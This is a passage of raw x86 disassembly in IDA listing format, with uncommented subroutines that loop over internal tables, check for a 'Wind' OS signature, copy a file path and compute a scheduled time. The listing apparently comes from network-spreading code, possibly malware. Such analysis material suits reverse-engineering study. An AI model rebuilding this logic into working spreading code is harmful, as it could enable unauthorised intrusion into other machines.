add edi, 4
inc esi
mov [edi], esi
mov dword ptr [edi+4], 0
dec esi
mov [edi+8], esi
add edi, 0Ch
push ebx
push [ebp+arg_4]
push edi
call sub_40F5BF
add edi, ebx
add edi, 3
and edi, 0FFFFFFFCh
mov dword ptr [edi], 1
add edi, 4
add edi, 4
mov dword ptr [edi], 1
add edi, 4
add edi, 4
add edi, 4
mov dword ptr [edi], 2
add edi, 4
mov esi, [ebp+var_4]
sub edi, esi
mov ecx, [ebp+arg_C]
mov [ecx], edi
mov eax, edi
pop ebx
pop esi
pop edi
leave
retn 10h
sub_408140 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408200 proc near ; CODE XREF: sub_407B46+E8�p
var_194 = byte ptr -194h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
add esp, 0FFFFFE6Ch
push edi
push esi
push ebx
push 258h
push 40h
call sub_40A1D0
mov [ebp+var_4], eax
mov edi, eax
mov ecx, [ebp+arg_4]
mov [ecx], eax
push [ebp+arg_0]
push offset dword_41840C
lea eax, [ebp+var_194]
push eax
call sub_40A0F2
add esp, 0Ch
mov dword ptr [edi], 0FFFFFFFFh
add edi, 4
lea eax, [ebp+var_194]
push eax
push edi
call sub_411BD0
add edi, eax
mov dword ptr [edi], 18h
add edi, 14h
mov dword ptr [edi], 0FFFFFFFFh
add edi, 4
mov dword ptr [edi], 0Ch
add edi, 4
mov word ptr [edi], 2
add edi, 2
mov byte ptr [edi], 1
add edi, 1
add edi, 1
mov dword ptr [edi], 800h
add edi, 4
mov esi, [ebp+var_4]
sub edi, esi
mov ecx, [ebp+arg_8]
mov [ecx], edi
mov eax, edi
pop ebx
pop esi
pop edi
leave
retn 0Ch
sub_408200 endp
; ---------------------------------------------------------------------------
db 8Dh, 0A4h, 24h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4082A0 proc near ; CODE XREF: sub_407B46+4C9�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push edi
push esi
push ebx
mov [ebp+var_4], 0
cmp [ebp+var_4], 0
jnz short loc_4082DD
lea esi, byte_418543
jmp short loc_4082D8
; ---------------------------------------------------------------------------
loc_4082BE: ; CODE XREF: sub_4082A0+3B�j
push [ebp+arg_0]
push dword ptr [esi]
call sub_40A24E
or eax, eax
jnz short loc_4082D5
mov [ebp+var_4], 1
jmp short loc_4082DD
; ---------------------------------------------------------------------------
loc_4082D5: ; CODE XREF: sub_4082A0+2A�j
add esi, 4
loc_4082D8: ; CODE XREF: sub_4082A0+1C�j
cmp dword ptr [esi], 0
jnz short loc_4082BE
loc_4082DD: ; CODE XREF: sub_4082A0+14�j
; sub_4082A0+33�j
cmp [ebp+var_4], 0
jnz short loc_408316
lea esi, byte_41857B
jmp short loc_408311
; ---------------------------------------------------------------------------
loc_4082EB: ; CODE XREF: sub_4082A0+74�j
push dword ptr [esi]
push [ebp+arg_0]
push 1
call sub_4083A0
or eax, eax
jz short loc_40830E
cmp eax, 0FFFFFFFFh
jz short loc_40830E
cmp eax, 0FFFFFFFEh
jz short loc_40830E
mov [ebp+var_4], 1
jmp short loc_408316
; ---------------------------------------------------------------------------
loc_40830E: ; CODE XREF: sub_4082A0+59�j
; sub_4082A0+5E�j ...
add esi, 4
loc_408311: ; CODE XREF: sub_4082A0+49�j
cmp dword ptr [esi], 0
jnz short loc_4082EB
loc_408316: ; CODE XREF: sub_4082A0+41�j
; sub_4082A0+6C�j
cmp [ebp+var_4], 0
jnz short loc_40834F
lea esi, byte_4185CB
jmp short loc_40834A
; ---------------------------------------------------------------------------
loc_408324: ; CODE XREF: sub_4082A0+AD�j
push dword ptr [esi]
push [ebp+arg_0]
push 1
call sub_4083A0
or eax, eax
jz short loc_408347
cmp eax, 0FFFFFFFFh
jz short loc_408347
cmp eax, 0FFFFFFFEh
jz short loc_408347
mov [ebp+var_4], 1
jmp short loc_40834F
; ---------------------------------------------------------------------------
loc_408347: ; CODE XREF: sub_4082A0+92�j
; sub_4082A0+97�j ...
add esi, 4
loc_40834A: ; CODE XREF: sub_4082A0+82�j
cmp dword ptr [esi], 0
jnz short loc_408324
loc_40834F: ; CODE XREF: sub_4082A0+7A�j
; sub_4082A0+A5�j
mov eax, [ebp+var_4]
pop ebx
pop esi
pop edi
leave
retn 4
sub_4082A0 endp
; ---------------------------------------------------------------------------
db 8Dh, 0A4h, 24h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408360 proc near ; CODE XREF: sub_4083A0+C�p
; sub_4083A0+17�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
mov eax, [ebp+arg_0]
lea edx, [eax+3]
loc_40836A: ; CODE XREF: sub_408360+1F�j
mov ebx, [eax]
add eax, 4
lea ecx, [ebx-1010101h]
not ebx
and ecx, ebx
and ecx, 80808080h
jz short loc_40836A
test ecx, 8080h
jnz short loc_40838F
shr ecx, 10h
add eax, 2
loc_40838F: ; CODE XREF: sub_408360+27�j
shl cl, 1
sbb eax, edx
pop ebx
leave
retn 4
sub_408360 endp
; ---------------------------------------------------------------------------
dd 24A48Dh, 90000000h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4083A0 proc near ; CODE XREF: rdata:00404700�p
; sub_4082A0+52�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
push esi
push edi
push [ebp+arg_4]
call sub_408360
mov [ebp+var_4], eax
push [ebp+arg_8]
call sub_408360
mov [ebp+var_8], eax
cmp [ebp+arg_0], 1
jge short loc_4083CC
mov eax, 0FFFFFFFEh
jmp short loc_408438
; ---------------------------------------------------------------------------
loc_4083CC: ; CODE XREF: sub_4083A0+23�j
dec [ebp+arg_0]
cmp eax, [ebp+var_4]
jl short loc_4083DB
mov eax, 0FFFFFFFFh
jmp short loc_408438
; ---------------------------------------------------------------------------
loc_4083DB: ; CODE XREF: sub_4083A0+32�j
sub [ebp+var_4], eax
inc [ebp+var_4]
mov ecx, [ebp+var_4]
cmp ecx, [ebp+arg_0]
jg short loc_4083F0
mov eax, 0FFFFFFFEh
jmp short loc_408438
; ---------------------------------------------------------------------------
loc_4083F0: ; CODE XREF: sub_4083A0+47�j
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_8]
mov al, [edi]
add esi, ecx
neg ecx
add ecx, [ebp+arg_0]
jmp short loc_408411
; ---------------------------------------------------------------------------
db 8Dh, 0A4h, 24h
align 8
dd 24A48Dh, 90000000h
; ---------------------------------------------------------------------------
loc_408410: ; CODE XREF: sub_4083A0+89�j
inc ecx
loc_408411: ; CODE XREF: sub_4083A0+5F�j
; sub_4083A0+77�j
cmp al, [ecx+esi]
jz short loc_40841B
inc ecx
js short loc_408411
jmp short loc_408436
; ---------------------------------------------------------------------------
loc_40841B: ; CODE XREF: sub_4083A0+74�j
lea ebx, [ecx+esi]
mov edx, [ebp+var_8]
loc_408421: ; CODE XREF: sub_4083A0+8C�j
mov ah, [edx+ebx-1]
cmp ah, [edx+edi-1]
jnz short loc_408410
dec edx
jnz short loc_408421
add ecx, [ebp+var_4]
mov eax, ecx
inc eax
jmp short loc_408438
; ---------------------------------------------------------------------------
loc_408436: ; CODE XREF: sub_4083A0+79�j
xor eax, eax
loc_408438: ; CODE XREF: sub_4083A0+2A�j
; sub_4083A0+39�j ...
pop edi
pop esi
pop ebx
leave
retn 0Ch
sub_4083A0 endp
; ---------------------------------------------------------------------------
db 90h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408440 proc near ; CODE XREF: sub_408DC0+7AD�p
var_546 = dword ptr -546h
var_542 = dword ptr -542h
var_53E = byte ptr -53Eh
var_53D = byte ptr -53Dh
var_53C = dword ptr -53Ch
var_538 = dword ptr -538h
var_534 = dword ptr -534h
var_530 = dword ptr -530h
var_52C = byte ptr -52Ch
var_528 = dword ptr -528h
var_524 = dword ptr -524h
var_520 = dword ptr -520h
var_51A = byte ptr -51Ah
var_4CA = byte ptr -4CAh
var_47A = byte ptr -47Ah
var_42A = byte ptr -42Ah
var_3DA = byte ptr -3DAh
var_38A = byte ptr -38Ah
var_33A = byte ptr -33Ah
var_312 = byte ptr -312h
var_2CC = byte ptr -2CCh
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFAB8h
push edi
push esi
push ebx
push (offset loc_41AE94+2)
call sub_40A134
push [ebp+arg_0]
pop [ebp+var_530]
push [ebp+arg_0]
call sub_40A320
push eax
lea eax, [ebp+var_312]
push eax
call sub_40A25A
push (offset loc_41AE94+2)
call sub_40A1C4
push offset dword_41BC90
call sub_40A1B8
push 0
push 0
push 0
lea eax, [ebp+var_312]
push eax
call sub_411800
mov [ebp+var_8], eax
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_4084D1
cmp [ebp+var_8], 0FFFFFFFBh
jz short loc_4084D1
mov ebx, [ebp+var_8]
lea ecx, [ebx+18Ah]
cmp dword ptr [ecx], 646E6957h
jz short loc_4084C7
push [ebp+var_8]
call sub_412230
jmp loc_4087FF
; ---------------------------------------------------------------------------
loc_4084C7: ; CODE XREF: sub_408440+78�j
push [ebp+var_8]
call sub_412230
jmp short loc_4084DC
; ---------------------------------------------------------------------------
loc_4084D1: ; CODE XREF: sub_408440+61�j
; sub_408440+67�j
cmp [ebp+var_8], 0FFFFFFFBh
jnz short loc_4084DC
jmp loc_4087FF
; ---------------------------------------------------------------------------
loc_4084DC: ; CODE XREF: sub_408440+8F�j
; sub_408440+95�j
mov [ebp+var_4], 0FFFFFFFFh
lea esi, [ebp+var_33A]
lea eax, [ebp+var_38A]
mov [esi], eax
lea eax, [ebp+var_3DA]
mov [esi+4], eax
lea eax, [ebp+var_42A]
mov [esi+8], eax
lea eax, [ebp+var_47A]
mov [esi+0Ch], eax
lea eax, [ebp+var_4CA]
mov [esi+10h], eax
lea eax, [ebp+var_51A]
mov [esi+14h], eax
lea eax, [ebp+var_33A]
push eax
push [ebp+var_530]
call sub_407B46
xor ecx, ecx
or eax, eax
jnz short loc_40854C
lea eax, loc_41417D
mov [esi], eax
lea eax, loc_41418B
mov [esi+4], eax
mov [esi+8], ecx
jmp short loc_40854F
; ---------------------------------------------------------------------------
loc_40854C: ; CODE XREF: sub_408440+F4�j
mov [esi+eax*4], ecx
loc_40854F: ; CODE XREF: sub_408440+10A�j
lea esi, [ebp+var_33A]
jmp loc_4087F6
; ---------------------------------------------------------------------------
loc_40855A: ; CODE XREF: sub_408440+3B9�j
lea edi, loc_414191
mov [ebp+var_534], 0
jmp loc_4087DC
; ---------------------------------------------------------------------------
loc_40856F: ; CODE XREF: sub_408440+39F�j
mov [ebp+var_538], 0
loc_408579: ; DATA XREF: rdata:0040ABDE�o
cmp [ebp+var_534], 0
jnz short loc_4085A6
push 0
loc_408584: ; DATA XREF: rdata:0040ABE2�o
push dword ptr [esi]
push dword ptr [esi]
lea eax, [ebp+var_312]
loc_40858E: ; DATA XREF: rdata:0040ABE6�o
push eax
call sub_411800
loc_408594: ; DATA XREF: rdata:0040ABEA�o
mov [ebp+var_534], 1
loc_40859E: ; DATA XREF: rdata:0040ABEE�o
mov [ebp+var_538], eax
jmp short loc_4085B8
; ---------------------------------------------------------------------------
loc_4085A6: ; CODE XREF: sub_408440+140�j
push 0
push dword ptr [edi]
push dword ptr [esi]
loc_4085AC: ; DATA XREF: rdata:0040ABF2�o
lea eax, [ebp+var_312]
push eax
loc_4085B3: ; DATA XREF: rdata:0040ABF6�o
call sub_411800
loc_4085B8: ; CODE XREF: sub_408440+164�j
mov [ebp+var_8], eax
cmp [ebp+var_8], 0FFFFFFFFh
loc_4085BF: ; DATA XREF: rdata:0040ABFA�o
jz loc_4087C0
cmp [ebp+var_8], 0FFFFFFFBh
loc_4085C9: ; DATA XREF: rdata:0040ABFE�o
jz loc_4087C0
mov edx, [ebp+var_8]
loc_4085D2: ; DATA XREF: rdata:0040AC02�o
lea ecx, [edx+18Ah]
cmp dword ptr [ecx], 646E6957h
loc_4085DE: ; DATA XREF: rdata:0040ACA2�o
jz short loc_4085F4
push [ebp+var_8]
call sub_412230
loc_4085E8: ; DATA XREF: rdata:0040ACA6�o
mov [ebp+var_4], 0FFFFFFFBh
loc_4085EF: ; DATA XREF: rdata:0040ACAA�o
jmp loc_4087E5
; ---------------------------------------------------------------------------
loc_4085F4: ; CODE XREF: sub_408440:loc_4085DE�j
push (offset loc_41405F+2)
push [ebp+var_8]
loc_4085FC: ; DATA XREF: rdata:0040ACAE�o
call sub_410F30
mov [ebp+var_10], eax
loc_408604: ; DATA XREF: rdata:0040ACB2�o
cmp eax, 0FFFFFFFFh
jnz short loc_40861D
push [ebp+var_8]
loc_40860C: ; DATA XREF: rdata:0040ACB6�o
call sub_412230
mov [ebp+var_4], 0FFFFFFFBh
loc_408618: ; DATA XREF: rdata:0040ACBA�o
jmp loc_4087E5
; ---------------------------------------------------------------------------
loc_40861D: ; CODE XREF: sub_408440+1C7�j
push offset loc_414094
loc_408622: ; DATA XREF: rdata:0040ACBE�o
push [ebp+var_10]
call sub_411080
mov [ebp+var_C], eax
loc_40862D: ; DATA XREF: rdata:0040ACC2�o
cmp eax, 0FFFFFFFFh
jnz short loc_40864E
push [ebp+var_10]
loc_408635: ; DATA XREF: rdata:0040ACC6�o
call sub_412230
push [ebp+var_8]
call sub_412230
loc_408642: ; DATA XREF: rdata:0040ACCA�o
mov [ebp+var_4], 0FFFFFFFBh
loc_408649: ; DATA XREF: rdata:0040ACCE�o
jmp loc_4087E5
; ---------------------------------------------------------------------------
loc_40864E: ; CODE XREF: sub_408440+1F0�j
push (offset loc_4140F2+1)
push [ebp+var_C]
loc_408656: ; DATA XREF: rdata:0040ACD2�o
call sub_4111E0
cmp eax, 0FFFFFFFFh
jnz short loc_408684
loc_408660: ; DATA XREF: rdata:0040ACD6�o
push [ebp+var_C]
call sub_412230
loc_408668: ; DATA XREF: rdata:0040ACDA�o
push [ebp+var_10]
call sub_412230
push [ebp+var_8]
loc_408673: ; DATA XREF: rdata:0040ACDE�o
call sub_412230
loc_408678: ; DATA XREF: rdata:0040ACE2�o
mov [ebp+var_4], 0FFFFFFFBh
jmp loc_4087E5
; ---------------------------------------------------------------------------
loc_408684: ; CODE XREF: sub_408440+21E�j
xor eax, eax
loc_408686: ; DATA XREF: rdata:0040ACE6�o
mov [ebp+var_546], eax
loc_40868C: ; DATA XREF: rdata:0040ACEA�o
mov [ebp+var_542], 0
loc_408696: ; DATA XREF: rdata:0040ACEE�o
mov [ebp+var_53E], 0
mov [ebp+var_53D], 0
loc_4086A4: ; DATA XREF: rdata:0040ACF2�o
lea eax, loc_414135
mov [ebp+var_53C], eax
loc_4086B0: ; DATA XREF: rdata:0040ACF6�o
lea eax, [ebp+var_524]
push eax
loc_4086B7: ; DATA XREF: rdata:0040ACFA�o
lea eax, [ebp+var_520]
push eax
lea eax, [ebp+var_546]
loc_4086C4: ; DATA XREF: rdata:0040ACFE�o
push eax
lea eax, [ebp+var_312]
push eax
loc_4086CC: ; DATA XREF: rdata:0040AD02�o
push [ebp+var_C]
call sub_411C50
loc_4086D4: ; DATA XREF: rdata:0040AD06�o
lea eax, [ebp+var_52C]
push eax
lea eax, [ebp+var_528]
push eax
loc_4086E2: ; DATA XREF: rdata:0040AC22�o
push [ebp+var_524]
loc_4086E8: ; DATA XREF: rdata:0040AC26�o
push [ebp+var_520]
push 3
push 0
push [ebp+var_C]
loc_4086F5: ; DATA XREF: rdata:0040AC2A�o
call sub_411340
cmp eax, 0FFFFFFFFh
loc_4086FD: ; DATA XREF: rdata:0040AC2E�o
jz loc_40879E
mov eax, [ebp+var_528]
loc_408709: ; DATA XREF: rdata:0040AC32�o
or eax, eax
jz short loc_408710
mov ecx, [eax+4]
loc_408710: ; CODE XREF: sub_408440+2CB�j
or ecx, ecx
loc_408712: ; DATA XREF: rdata:0040AC36�o
jnz loc_40879E
loc_408718: ; DATA XREF: rdata:0040AC3A�o
cmp [ebp+var_538], 0
jz short loc_40875D
push offset word_41B10A
loc_408726: ; DATA XREF: rdata:0040AC3E�o
lea eax, [ebp+var_312]
push eax
push [ebp+var_8]
loc_408730: ; DATA XREF: rdata:0040AC42�o
call sub_408810
push dword ptr [esi]
push dword ptr [esi]
loc_408739: ; DATA XREF: rdata:0040AC46�o
lea eax, [ebx+18Ah]
push eax
lea eax, [ebp+var_312]
loc_408746: ; DATA XREF: rdata:0040AC4A�o
push eax
push (offset loc_41413F+2)
loc_40874C: ; DATA XREF: rdata:0040AC4E�o
lea eax, [ebp+var_2CC]
push eax
loc_408753: ; DATA XREF: rdata:0040AC52�o
call sub_40A0F2
add esp, 18h
loc_40875B: ; DATA XREF: rdata:0040AC56�o
jmp short loc_408797
; ---------------------------------------------------------------------------
loc_40875D: ; CODE XREF: sub_408440+2DF�j
push offset word_41B10A
loc_408762: ; DATA XREF: rdata:0040AC5A�o
lea eax, [ebp+var_312]
push eax
loc_408769: ; DATA XREF: rdata:0040AC5E�o
push [ebp+var_8]
loc_40876C: ; DATA XREF: rdata:0040AC62�o
call sub_408810
push dword ptr [edi]
push dword ptr [esi]
loc_408775: ; DATA XREF: rdata:0040AC66�o
lea eax, [ebx+18Ah]
push eax
loc_40877C: ; DATA XREF: rdata:0040AC6A�o
lea eax, [ebp+var_312]
push eax
loc_408783: ; DATA XREF: rdata:0040AC6E�o
push (offset loc_41413F+2)
loc_408788: ; DATA XREF: rdata:0040AC72�o
lea eax, [ebp+var_2CC]
push eax
loc_40878F: ; DATA XREF: rdata:0040AC76�o
call sub_40A0F2
add esp, 18h
loc_408797: ; CODE XREF: sub_408440:loc_40875B�j
; DATA XREF: rdata:0040AC7A�o
mov [ebp+var_4], 0
loc_40879E: ; CODE XREF: sub_408440:loc_4086FD�j
; sub_408440:loc_408712�j
push [ebp+var_C]
loc_4087A1: ; DATA XREF: rdata:0040AC7E�o
call sub_412230
loc_4087A6: ; DATA XREF: rdata:0040AC82�o
push [ebp+var_10]
call sub_412230
loc_4087AE: ; DATA XREF: rdata:0040AC86�o
push [ebp+var_8]
call sub_412230
loc_4087B6: ; DATA XREF: rdata:0040ABCA�o
cmp [ebp+var_4], 0
jnz short loc_4087CF
loc_4087BC: ; DATA XREF: rdata:0040ABD2�o
jmp short loc_4087E5
; ---------------------------------------------------------------------------
dw 0FEBh
; ---------------------------------------------------------------------------
loc_4087C0: ; CODE XREF: sub_408440:loc_4085BF�j
; sub_408440:loc_4085C9�j
cmp [ebp+var_8], 0FFFFFFFBh
loc_4087C4: ; DATA XREF: rdata:0040ABCE�o
; rdata:0040ABD6�o ...
jnz short loc_4087CF
mov [ebp+var_4], 0FFFFFFFBh ; DATA XREF: sub_40A950+26�r
jmp short loc_4087E5
; ---------------------------------------------------------------------------
loc_4087CF: ; CODE XREF: sub_408440+37A�j
; sub_408440:loc_4087C4�j
push 0FAh
call sub_40A212
add edi, 4
loc_4087DC: ; CODE XREF: sub_408440+12A�j
cmp dword ptr [edi], 0
jnz loc_40856F
loc_4087E5: ; CODE XREF: sub_408440:loc_4085EF�j
; sub_408440:loc_408618�j ...
add esi, 4
cmp [ebp+var_4], 0
jz short loc_4087F4
cmp [ebp+var_4], 0FFFFFFFBh
jnz short loc_4087F6
loc_4087F4: ; CODE XREF: sub_408440+3AC�j
jmp short loc_4087FF
; ---------------------------------------------------------------------------
loc_4087F6: ; CODE XREF: sub_408440+115�j
; sub_408440+3B2�j
cmp dword ptr [esi], 0
jnz loc_40855A
loc_4087FF: ; CODE XREF: sub_408440+82�j
; sub_408440+97�j ...
push offset dword_41BC90
call sub_40A1B2
pop ebx
pop esi
pop edi
leave
retn 4
sub_408440 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408810 proc near ; CODE XREF: sub_408440:loc_408730�p
; sub_408440:loc_40876C�p
var_B14 = byte ptr -0B14h
var_4D2 = dword ptr -4D2h
var_4CE = dword ptr -4CEh
var_4CA = byte ptr -4CAh
var_4C9 = byte ptr -4C9h
var_4C8 = dword ptr -4C8h
var_4C4 = byte ptr -4C4h
var_208 = byte ptr -208h
var_DC = byte ptr -0DCh
var_D8 = byte ptr -0D8h
var_D4 = byte ptr -0D4h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
add esp, 0FFFFF4ECh
push edi
push esi
push ebx
push [ebp+arg_0]
pop [ebp+var_4]
push (offset loc_41405F+2)
push [ebp+var_4]
call sub_410F30
mov [ebp+var_8], eax
cmp eax, 0FFFFFFFFh
jz loc_4089AF
push offset loc_41411C
lea eax, [ebp+var_4C4]
push eax
call sub_40A25A
lea eax, [ebp+var_4C4]
push eax
push offset loc_414119
push [ebp+arg_4]
push [ebp+var_8]
call sub_408AD0
cmp eax, 844h
jnz short loc_408892
push (offset loc_41411F+1)
lea eax, [ebp+var_4C4]
push eax
call sub_40A25A
lea eax, [ebp+var_4C4]
push eax
push offset loc_414119
push [ebp+arg_4]
push [ebp+var_8]
call sub_408AD0
loc_408892: ; CODE XREF: sub_408810+58�j
or eax, eax
jz short loc_4088A1
cmp eax, 846h
jnz loc_4089AF
loc_4088A1: ; CODE XREF: sub_408810+84�j
mov edi, [ebp+arg_8]
push edi
call sub_40A266
jmp short loc_4088AD
; ---------------------------------------------------------------------------
loc_4088AC: ; CODE XREF: sub_408810+A1�j
dec eax
loc_4088AD: ; CODE XREF: sub_408810+9A�j
cmp byte ptr [eax+edi], 5Ch
jnz short loc_4088AC
lea edi, [eax+edi]
push edi
lea eax, [ebp+var_B14]
push eax
call sub_40A25A
lea eax, [ebp+var_B14]
push eax
push [ebp+arg_8]
push offset loc_414119
push [ebp+var_4]
call sub_408BB0
cmp eax, 0FFFFFFFFh
jz loc_4089AF
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_D4]
push eax
push [ebp+var_8]
call sub_408A40
cmp eax, 0FFFFFFFFh
jz loc_4089AF
lea edi, [ebp+var_D4]
add edi, 4
mov eax, [edi]
xor edx, edx
push 3Ch
pop ecx
div ecx
sub eax, [edi+18h]
add eax, 2
xor edx, edx
mov ecx, 5A0h
div ecx
mov eax, edx
imul eax, 0EA60h
mov [ebp+var_4D2], eax
mov [ebp+var_4CE], 0
mov [ebp+var_4CA], 0
mov [ebp+var_4C9], 0
mov edi, [ebp+arg_8]
push edi
call sub_40A266
jmp short loc_408952
; ---------------------------------------------------------------------------
loc_408951: ; CODE XREF: sub_408810+146�j
dec eax
loc_408952: ; CODE XREF: sub_408810+13F�j
cmp byte ptr [eax+edi], 5Ch
jnz short loc_408951
inc eax
lea edi, [eax+edi]
lea eax, [ebp+var_4C4]
push eax
lea eax, [ebp+var_208]
push eax
call sub_40A25A
push edi
lea eax, [ebp+var_208]
push eax
call sub_40A248
lea eax, [ebp+var_208]
mov [ebp+var_4C8], eax
lea eax, [ebp+var_DC]
push eax
lea eax, [ebp+var_D8]
push eax
lea eax, [ebp+var_4D2]
push eax
push [ebp+arg_4]
push [ebp+var_8]
call sub_4089C0
cmp eax, 0FFFFFFFFh
jz short loc_4089AF
xor esi, esi
loc_4089AF: ; CODE XREF: sub_408810+25�j
; sub_408810+8B�j ...
push [ebp+var_8]
call sub_412230
pop ebx
pop esi
pop edi
leave
retn 0Ch
sub_408810 endp
; ---------------------------------------------------------------------------
dw 0FF8Bh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4089C0 proc near ; CODE XREF: sub_408810+193�p
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
push edi
push esi
push ebx
mov esi, 0FFFFFFFFh
push offset loc_414094
push [ebp+arg_0]
call sub_411080
mov [ebp+var_14], eax
cmp eax, 0FFFFFFFFh
jz short loc_408A30
push (offset loc_4140F2+1)
push [ebp+var_14]
call sub_4111E0
cmp eax, 0FFFFFFFFh
jz short loc_408A28
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+var_14]
call sub_411C50
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+var_8]
push [ebp+var_4]
push 0
push [ebp+var_14]
call sub_412840
cmp eax, 0FFFFFFFFh
jz short loc_408A28
xor esi, esi
loc_408A28: ; CODE XREF: sub_4089C0+33�j
; sub_4089C0+64�j
push [ebp+var_14]
call sub_412230
loc_408A30: ; CODE XREF: sub_4089C0+21�j
mov eax, esi
pop ebx
pop esi
pop edi
leave
retn 14h
sub_4089C0 endp
; ---------------------------------------------------------------------------
db 8Dh, 0A4h, 24h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408A40 proc near ; CODE XREF: sub_408810+E1�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
add esp, 0FFFFFFCCh
push edi
push esi
push ebx
mov esi, 0FFFFFFFFh
push 28h
push 0
lea eax, [ebp+var_2C]
push eax
call sub_40F5F0
push (offset loc_41409A+1)
push [ebp+arg_0]
call sub_411080
mov [ebp+var_4], eax
cmp eax, 0FFFFFFFFh
jz short loc_408ABF
push offset loc_4140A3
push [ebp+var_4]
call sub_4111E0
cmp eax, 0FFFFFFFFh
jz short loc_408AB7
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+var_30]
push eax
push 28h
lea eax, [ebp+var_2C]
push eax
push 1Ch
push [ebp+var_4]
call sub_412840
cmp eax, 0FFFFFFFFh
jz short loc_408AB7
mov edx, [ebp+arg_8]
mov eax, [ebp+var_34]
mov [edx], eax
push [ebp+var_34]
push [ebp+var_30]
push [ebp+arg_4]
call sub_40F5BF
xor esi, esi
loc_408AB7: ; CODE XREF: sub_408A40+40�j
; sub_408A40+5D�j
push [ebp+var_4]
call sub_412230
loc_408ABF: ; CODE XREF: sub_408A40+2E�j
mov eax, esi
pop ebx
pop esi
pop edi
leave
retn 0Ch
sub_408A40 endp
; ---------------------------------------------------------------------------
dd 24A48Dh, 90000000h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408AD0 proc near ; CODE XREF: sub_408810+4E�p
; sub_408810+7D�p
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = byte ptr -130h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
add esp, 0FFFFFEC0h
push edi
push esi
push ebx
mov esi, 0FFFFFFFFh
push [ebp+arg_4]
push offset loc_414114
lea eax, [ebp+var_130]
push eax
call sub_40A0F2
add esp, 0Ch
push (offset loc_41409A+1)
push [ebp+arg_0]
call sub_411080
mov [ebp+var_4], eax
cmp eax, 0FFFFFFFFh
jz loc_408B9D
push offset loc_4140A3
push [ebp+var_4]
call sub_4111E0
cmp eax, 0FFFFFFFFh
jz short loc_408B95
lea eax, [ebp+var_138]
push eax
lea eax, [ebp+var_134]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
lea eax, [ebp+var_130]
push eax
push [ebp+var_4]
call sub_411B10
lea eax, [ebp+var_140]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_138]
push [ebp+var_134]
push 0Eh
push [ebp+var_4]
call sub_412840
cmp eax, 0FFFFFFFFh
jz short loc_408B8A
cmp [ebp+var_140], 8
jnz short loc_408B8A
cmp [ebp+var_13C], 0
jz short loc_408B8A
mov edx, [ebp+var_13C]
mov esi, [edx+4]
loc_408B8A: ; CODE XREF: sub_408AD0+9D�j
; sub_408AD0+A6�j ...
push [ebp+var_134]
call sub_411CE0
loc_408B95: ; CODE XREF: sub_408AD0+51�j
push [ebp+var_4]
call sub_412230
loc_408B9D: ; CODE XREF: sub_408AD0+3B�j
mov eax, esi
pop ebx
pop esi
pop edi
leave
retn 10h
sub_408AD0 endp
; ---------------------------------------------------------------------------
dw 0A48Dh
dd 24h, 498D00h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408BB0 proc near ; CODE XREF: sub_408810+C5�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push edi
push esi
push ebx
mov esi, 0FFFFFFFFh
push [ebp+arg_4]
push [ebp+arg_0]
call sub_410F30
mov [ebp+var_4], eax
cmp eax, 0FFFFFFFFh
jz short loc_408C06
push [ebp+arg_C]
push [ebp+var_4]
call sub_412470
mov [ebp+var_8], eax
cmp eax, 0FFFFFFFFh
jz short loc_408BFE
push [ebp+arg_8]
push [ebp+var_8]
call sub_4125D0
cmp eax, 0FFFFFFFFh
jz short loc_408BF6
xor esi, esi
loc_408BF6: ; CODE XREF: sub_408BB0+42�j
push [ebp+var_8]
call sub_412230
loc_408BFE: ; CODE XREF: sub_408BB0+32�j
